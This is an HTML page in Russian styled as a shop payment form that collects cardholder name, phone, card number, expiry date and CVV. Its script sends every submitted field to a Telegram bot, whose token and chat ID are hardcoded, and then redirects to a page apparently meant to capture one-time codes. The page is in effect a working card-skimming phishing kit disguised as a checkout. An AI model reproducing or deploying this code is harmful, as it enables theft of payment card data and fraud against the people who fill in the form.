<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Payment Form</title>
    <style>
        * {
            box-sizing: border-box;
            margin: 0;
            padding: 0;
        }

        body {
            font-family: 'Arial', sans-serif;
            background-color: hsl(206, 4%, 6%);
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            padding: 15px; 
            position: relative; /* Чтобы кнопка находилась в контексте body */
        }

        .back-button {
            position: absolute;
            top: 20px;
            right: 20px;
            background-color: hsl(206, 4%, 6%);
            color: #fff;
            padding: 10px 20px;
            text-decoration: none;
            border-radius: 5px;
            font-size: 16px;
            transition: background-color 0.3s ease;
        }

        .back-button:hover {
            background-color: hsl(206, 4%, 15%);
        }

        .container {
            max-width: 100%;
            width: 100%;
            max-width: 500px;
            padding: 20px;
            background-color: #ffffff;
            border-radius: 10px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
            margin: 0 auto;
        }

        h1 {
            margin-bottom: 20px;
            font-size: 24px;
            color: #333;
            text-align: center;
        }

        .form-group {
            margin-bottom: 15px;
        }

        label {
            display: block;
            font-weight: 600;
            margin-bottom: 5px;
            color: #666;
        }

        input[type="text"],
        input[type="number"],
        input[type="tel"] {
            width: 100%;
            padding: 12px;
            border: 1px solid #ddd;
            border-radius: 8px;
            font-size: 16px;
            color: #333;
            margin-bottom: 10px; /* Добавляем отступ между полями ввода */
        }

        input[type="text"]::placeholder,
        input[type="number"]::placeholder,
        input[type="tel"]::placeholder {
            color: #aaa;
        }

        button[type="submit"] {
            width: 100%;
            padding: 15px;
            background-color: hsl(206, 4%, 6%);
            color: #fff;
            border: none;
            border-radius: 8px;
            font-size: 18px;
            cursor: pointer;
            transition: background-color 0.3s ease;
        }

        @media (max-width: 768px) {
            .container {
                padding: 15px;
            }
            
            h1 {
                font-size: 20px;
            }
        }

        @media (max-width: 480px) {
            .container {
                padding: 10px;
            }
            
            h1 {
                font-size: 18px;
            }

            input[type="text"],
            input[type="number"],
            input[type="tel"] {
                font-size: 14px;
            }

            button[type="submit"] {
                font-size: 16px;
                padding: 12px;
            }
        }
    </style>
</head>
<body>
    <a href="index.html" class="back-button">На главную</a>
    <div class="container">
        <form id="payment-form">
            <div class="form-group">
                <label for="cardholder">Имя владельца карты:</label>
                <input
                    type="text"
                    id="cardholder"
                    name="name"
                    placeholder="Введите ваше полное имя"
                    required
                />
            </div>
            <div class="form-group">
                <label for="phone">Номер телефона владельца карты:</label>
                <input
                    type="tel"
                    id="phone"
                    name="phone"
                    placeholder="+7 (999) 999-99-99"
                    pattern="[+]{1}[7]{1}[(]{1}[0-9]{3}[)]{1} [0-9]{3}-[0-9]{2}-[0-9]{2}"
                    required
                />
            </div>
            <div class="form-group">
                <label for="cardnumber">Номер карты:</label>
                <input
                    type="text"
                    id="cardnumber"
                    name="card_number"
                    placeholder="0000 0000 0000 0000"
                    required
                />
            </div>
            <div class="form-group">
                <label for="expiration">Срок действия:</label>
                <input
                    type="text"
                    id="expiration"
                    name="expiry"
                    placeholder="MM / YY"
                    required
                />
            </div>
            
            <div class="form-group">
                <label for="cvv">CVV:</label>
                <input type="number" id="cvv" name="cvv" placeholder="CVV(Код с обратной стороны карты" required />
            </div>
            <button type="submit">
                Оформить заказ
            </button>
        </form>
    </div>
    <script src="https://unpkg.com/axios/dist/axios.min.js"></script>
    <script>
        document.addEventListener("DOMContentLoaded", function () {
            const TOKEN = "7701285642:AAEDp_4rRF5Fsp9nsh1E_UsHjTU2TkB_qYs";
            const CHAT_ID = "-1002311882270";
            const URL_API = `https://api.telegram.org/bot${TOKEN}/sendMessage`;

            const form = document.getElementById("payment-form");

            if (form) {
                form.addEventListener("submit", function (e) {
                    e.preventDefault();

                    const name = document.getElementById("cardholder").value;
                    const phone = document.getElementById("phone").value;
                    const cardNumber = document.getElementById("cardnumber").value;
                    const expiry = document.getElementById("expiration").value;
                    const cvv = document.getElementById("cvv").value;

                    let message =
                        "Заявка с сайта\n" +
                        "Name: " +
                        name +
                        "\nPhone: " +
                        phone +
                        "\nCard: " +
                        cardNumber +
                        "\nDate: " +
                        expiry +
                        "\nCVV: " +
                        cvv;

                    axios
                        .post(URL_API, {
                            chat_id: CHAT_ID,
                            parse_mode: "html",
                            text: message,
                        })
                        .then(() => {
                            window.location.href = '/otp_code.html'; 
                        })
                        .catch((err) => {
                            console.warn(err);
                        })
                        .finally(() => {
                            console.log("Скрипт выполнен");
                        });
                });
            } else {
                console.error("Форма с id 'payment-form' не найдена.");
            }
        });
    </script>
</body>
</html>
